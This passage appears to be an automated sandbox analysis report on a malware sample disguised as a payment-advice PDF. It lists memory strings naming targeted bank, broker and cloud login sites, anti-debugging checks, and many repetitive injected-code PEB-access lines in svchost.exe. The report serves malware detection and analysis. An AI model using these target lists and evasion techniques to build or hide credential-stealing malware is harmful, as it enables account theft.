                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 3q3Zl7JL.11.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3q3Zl7JL.11.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 3q3Zl7JL.11.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3q3Zl7JL.11.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3q3Zl7JL.11.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3q3Zl7JL.11.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3q3Zl7JL.11.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3093772930.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                Source: 3q3Zl7JL.11.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3q3Zl7JL.11.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | API call chain: ExitProcess graph end node graph_0-104491
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\rasautou.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0387096E rdtsc 8_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00417E23 LdrLoadDll, 8_2_00417E23
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008B3F09 BlockInput, 0_2_008B3F09
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00843B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00843B3A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00875A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00875A7C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00844B37 LoadLibraryA,GetProcAddress, 0_2_00844B37
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_01656470 mov eax, dword ptr fs:[00000030h] 0_2_01656470
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_01656410 mov eax, dword ptr fs:[00000030h] 0_2_01656410
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_01654DD0 mov eax, dword ptr fs:[00000030h] 0_2_01654DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382E388 mov eax, dword ptr fs:[00000030h] 8_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0385438F mov eax, dword ptr fs:[00000030h] 8_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0385438F mov eax, dword ptr fs:[00000030h] 8_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03828397 mov eax, dword ptr fs:[00000030h] 8_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EC3CD mov eax, dword ptr fs:[00000030h] 8_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 8_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038383C0 mov eax, dword ptr fs:[00000030h] 8_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B63C0 mov eax, dword ptr fs:[00000030h] 8_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE3DB mov eax, dword ptr fs:[00000030h] 8_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h] 8_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D43D4 mov eax, dword ptr fs:[00000030h] 8_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038403E9 mov eax, dword ptr fs:[00000030h] 8_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 8_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038663FF mov eax, dword ptr fs:[00000030h] 8_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0386A30B mov eax, dword ptr fs:[00000030h] 8_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382C310 mov ecx, dword ptr fs:[00000030h] 8_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03850310 mov ecx, dword ptr fs:[00000030h] 8_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03908324 mov ecx, dword ptr fs:[00000030h] 8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03908324 mov eax, dword ptr fs:[00000030h] 8_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B2349 mov eax, dword ptr fs:[00000030h] 8_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov ecx, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B035C mov eax, dword ptr fs:[00000030h] 8_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038FA352 mov eax, dword ptr fs:[00000030h] 8_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D8350 mov ecx, dword ptr fs:[00000030h] 8_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0390634F mov eax, dword ptr fs:[00000030h] 8_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D437C mov eax, dword ptr fs:[00000030h] 8_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h] 8_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0386E284 mov eax, dword ptr fs:[00000030h] 8_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B0283 mov eax, dword ptr fs:[00000030h] 8_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h] 8_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038402A0 mov eax, dword ptr fs:[00000030h] 8_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038C62A0 mov eax, dword ptr fs:[00000030h] 8_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 8_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039062D6 mov eax, dword ptr fs:[00000030h] 8_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038402E1 mov eax, dword ptr fs:[00000030h] 8_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382823B mov eax, dword ptr fs:[00000030h] 8_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B8243 mov eax, dword ptr fs:[00000030h] 8_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B8243 mov ecx, dword ptr fs:[00000030h] 8_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0390625D mov eax, dword ptr fs:[00000030h] 8_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382A250 mov eax, dword ptr fs:[00000030h] 8_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03836259 mov eax, dword ptr fs:[00000030h] 8_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h] 8_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EA250 mov eax, dword ptr fs:[00000030h] 8_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03834260 mov eax, dword ptr fs:[00000030h] 8_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382826B mov eax, dword ptr fs:[00000030h] 8_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038E0274 mov eax, dword ptr fs:[00000030h] 8_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03870185 mov eax, dword ptr fs:[00000030h] 8_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h] 8_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038EC188 mov eax, dword ptr fs:[00000030h] 8_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h] 8_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038D4180 mov eax, dword ptr fs:[00000030h] 8_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038B019F mov eax, dword ptr fs:[00000030h] 8_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0382A197 mov eax, dword ptr fs:[00000030h] 8_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h] 8_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038F61C3 mov eax, dword ptr fs:[00000030h] 8_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 8_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_039061E5 mov eax, dword ptr fs:[00000030h] 8_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038601F8 mov eax, dword ptr fs:[00000030h] 8_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h] 8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov eax, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DE10E mov ecx, dword ptr fs:[00000030h]8_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov ecx, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038DA118 mov eax, dword ptr fs:[00000030h]8_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F0115 mov eax, dword ptr fs:[00000030h]8_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03860124 mov eax, dword ptr fs:[00000030h]8_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov ecx, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C4144 mov eax, dword ptr fs:[00000030h]8_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C156 mov eax, dword ptr fs:[00000030h]8_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C8158 mov eax, dword ptr fs:[00000030h]8_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836154 mov eax, dword ptr fs:[00000030h]8_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03836154 mov eax, dword ptr fs:[00000030h]8_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904164 mov eax, dword ptr fs:[00000030h]8_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03904164 mov eax, dword ptr fs:[00000030h]8_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0383208A mov eax, dword ptr fs:[00000030h]8_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038280A0 mov eax, dword ptr fs:[00000030h]8_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038C80A8 mov eax, dword ptr fs:[00000030h]8_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F60B8 mov eax, dword ptr fs:[00000030h]8_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038F60B8 mov ecx, dword ptr fs:[00000030h]8_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B20DE mov eax, dword ptr fs:[00000030h]8_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038380E9 mov eax, dword ptr fs:[00000030h]8_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B60E0 mov eax, dword ptr fs:[00000030h]8_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0382C0F0 mov eax, dword ptr fs:[00000030h]8_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038720F0 mov ecx, dword ptr fs:[00000030h]8_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038B4000 mov ecx, dword ptr fs:[00000030h]8_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038D2000 mov eax, dword ptr fs:[00000030h]8_2_038D2000
